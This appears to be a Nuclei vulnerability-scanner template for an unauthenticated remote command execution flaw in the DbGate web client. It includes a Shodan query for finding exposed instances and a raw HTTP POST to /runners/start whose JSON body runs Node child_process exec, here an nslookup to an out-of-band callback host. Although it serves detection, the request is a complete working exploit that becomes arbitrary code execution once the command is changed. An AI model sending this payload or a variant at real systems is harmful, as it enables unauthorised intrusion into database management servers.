35 lines
1000 B
YAML
35 lines
1000 B
YAML
id: dbgate-unauth-rce
|
|
|
|
info:
|
|
name: DbGate Web Client - Unauthenticated Remote Command Execution
|
|
author: h0j3n
|
|
severity: critical
|
|
description: |
|
|
DbGate Web Client Management is suspectible to an unauthenticated remote code execution vulnerability.
|
|
reference:
|
|
- https://github.com/dbgate/dbgate
|
|
- https://dbgate.org/docs/env-variables.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.favicon.hash:1198579728
|
|
tags: http,rce,oast,electron,dbgate,oss
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /runners/start HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"script":"process.mainModule.require('child_process').exec('nslookup {{interactsh-url}}')"}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code == 200
|
|
- contains(body, '\"runid\"')
|
|
- contains(interactsh_protocol, "dns")
|
|
condition: and |